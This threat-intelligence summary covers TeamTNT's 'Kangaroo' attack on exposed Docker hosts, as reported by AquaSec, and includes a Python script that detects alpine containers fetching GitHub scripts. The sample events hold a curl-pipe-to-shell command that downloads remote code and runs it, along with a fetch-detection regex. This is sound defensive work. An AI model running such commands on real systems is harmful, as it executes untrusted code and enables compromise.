Analyzing TeamTNT Attacks
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: AquaSec
Researchers from AquaSec have analyzed TeamTNT, a threat actor that commonly targets cloud environments, by studying the group's activity against the security team's honeypots. Interestingly, the group is attempting to compromise environments and use their computing resources to run Bitcoin encryption solvers. "Breaking the cryptographic encryption is considered 'Mission: Impossible.' If you actually succeed doing that, you potentially have the keys to almost everything that is connected online, which could have a devastating effect on the entire internet." Present-day technology is not capable of breaking the SECP256K1 encryption used by Bitcoin; however, it's commendable that TeamTNT is attempting to take a crack at it. The attack flow used to deploy the script is simple and is titled the "TeamTNT Kangaroo Attack." It begins with a scan for misconfigured Docker instances; once an exposed host is identified, the threat actors break in and deploy a vanilla alpine container image. With the image deployed, the actors pull down shell scripts hosted on GitHub and execute them. Other TeamTNT activity observed includes the use of rootkits to conceal their actions, the creation of cron jobs for persistence, scanning and lateral movement through the network over SSH, and the download and execution of a variety of scripts. TeamTNT's campaigns have frequently resulted in the deployment of a cryptominer.
- Docker API Abuse & Container Created
Anvilogic Use Cases:
- Publicly exposed Docker API
- New Docker Container
- Git Repository Accessed
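As an added example (not code from AquaSec or Anvilogic), the following detection pairs the "New Docker Container" and "Git Repository Accessed" use cases into one check for the Kangaroo attack flow described above: a container created from a vanilla alpine image that, shortly afterwards, runs an exec pulling a script from GitHub. The events are constructed to match the shape of `docker events --format '{{json .}}'` output; the image set, the fetch pattern and the 300-second window are assumptions to tune for your environment.

```python
import re

# Constructed sample events, shaped like `docker events --format '{{json .}}'`
# output; not taken from the AquaSec honeypot data.
SAMPLE_EVENTS = [
    {"Type": "container", "Action": "create", "time": 1660000000,
     "Actor": {"ID": "c1", "Attributes": {"image": "alpine:latest", "name": "tnt"}}},
    {"Type": "container", "Action": "start", "time": 1660000001,
     "Actor": {"ID": "c1", "Attributes": {"image": "alpine:latest", "name": "tnt"}}},
    {"Type": "container", "time": 1660000005,
     "Action": "exec_create: sh -c curl -sL https://raw.githubusercontent.com/example/x/init.sh | sh",
     "Actor": {"ID": "c1", "Attributes": {"image": "alpine:latest", "name": "tnt", "execID": "e1"}}},
    {"Type": "container", "Action": "create", "time": 1660000100,
     "Actor": {"ID": "c2", "Attributes": {"image": "registry.example.internal/app:1.4", "name": "app"}}},
    {"Type": "container", "Action": "exec_create: sh -c apk add curl", "time": 1660000105,
     "Actor": {"ID": "c2", "Attributes": {"image": "registry.example.internal/app:1.4", "name": "app", "execID": "e2"}}},
]

# Stock images used as a bare foothold; the page names alpine, extend as needed (assumption).
VANILLA_IMAGES = {"alpine"}
# Fetch tool followed by a GitHub host, covering the "Git Repository Accessed" use case.
FETCH_RE = re.compile(r"\b(curl|wget|git)\b.*\b(github\.com|raw\.githubusercontent\.com)\b")


def image_name(image):
    """Strip tag and digest: 'alpine:latest' -> 'alpine', 'reg/app:1.4' -> 'reg/app'."""
    image = image.split("@", 1)[0]
    head, _, tail = image.rpartition("/")
    tail = tail.split(":", 1)[0]
    return f"{head}/{tail}" if head else tail


def detect_kangaroo(events, window=300):
    """Return one alert per container created from a vanilla image that runs an
    exec fetching from GitHub within `window` seconds of its creation."""
    created = {}  # container ID -> (create time, image)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev.get("Type") != "container":
            continue
        cid = ev["Actor"]["ID"]
        image = ev["Actor"]["Attributes"].get("image", "")
        action = ev["Action"]
        if action == "create" and image_name(image) in VANILLA_IMAGES:
            created[cid] = (ev["time"], image)
        elif action.startswith("exec_create:") and cid in created:
            t0, img = created[cid]
            cmd = action.split(":", 1)[1].strip()
            if ev["time"] - t0 <= window and FETCH_RE.search(cmd):
                alerts.append({"container": cid, "image": img, "command": cmd,
                               "seconds_after_create": ev["time"] - t0})
    return alerts


if __name__ == "__main__":
    for alert in detect_kangaroo(SAMPLE_EVENTS):
        print(alert)
```

Feeding it the sample flags only container `c1`; the internal image that merely installs curl is left alone, which is the false-positive case a bare "container ran curl" rule would hit.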